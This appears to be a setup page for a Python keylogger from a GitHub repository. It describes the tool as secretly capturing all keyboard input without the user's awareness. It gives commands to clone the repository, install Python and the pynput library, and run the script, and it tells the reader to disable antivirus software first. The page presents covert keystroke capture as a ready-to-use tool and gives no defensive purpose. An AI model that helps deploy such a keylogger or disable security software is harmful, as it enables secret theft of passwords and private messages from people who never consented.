Appearance
Keylogger
Keylogger
What is a Keylogger?
A keylogger, in computer science, is a hardware or software tool capable of recording the keyboard inputs of a computer, meaning it can secretly intercept and capture everything typed on the keyboard without the user's awareness.
Note: Disable any antivirus software before running the keylogger.
Downloading the Files
bash
git clone https://github.com/ArduinoDenis/keylogger.gitHow to Install Python?
- If you have Windows 10 or 11, download Python from the Microsoft Store (the procedure is automatic).
- If you have macOS, download it by clicking on Download Python and follow the installation instructions.
- If you have Linux, open a terminal and type the following:
- Procedure for Linux (including macOS)
bash
sudo apt-get install python3 -y && sudo apt-get install python3-pipHow to Install the Library?
Open a terminal and copy and paste the following line:
bash
pip3 install pynputPress Enter and wait for the installation to complete.
Running the Script
bash
python3 keylogger.py